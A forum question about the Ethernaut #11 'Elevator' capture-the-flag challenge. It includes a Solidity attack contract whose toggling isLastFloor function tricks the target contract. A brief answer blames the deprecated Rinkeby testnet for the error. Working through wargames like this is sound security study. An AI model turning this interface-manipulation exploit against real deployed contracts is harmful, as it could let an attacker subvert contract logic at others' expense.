# Ethernaut #11 Elevator, Gas estimation failed

Tags: solidity, remix, gas, security, gas-estimate

I'm trying to solve Ethernaut #11 Elevator.
My solution works when I deploy a copy of the instance contract by myself on Remix VM, but when I try it on the real instance on the Rinkeby network, using Remix's Injected Provider - Metamask, calling the function goToTop() gives a "Gas estimation failed". I have also tried others' solutions that I have found online, and they all give me the same error.

My solution:

```
pragma solidity ^0.6.0;

contract Elevator {
  function goTo(uint _floor) public {}
}


contract Attack {

  Elevator public e;
  bool public toggle = true;

  constructor(address target) public {
    e = Elevator(target);
  }

  function goToTop() public {
    uint top = 0;
    top -= 1;
    e.goTo(top);
  }

  function isLastFloor(uint) external returns (bool) {
    toggle = !toggle;
    return toggle;
  }
}
```

Answer (score 1):

The Rinkeby network is deprecated. You can switch to the Goerli network and try again.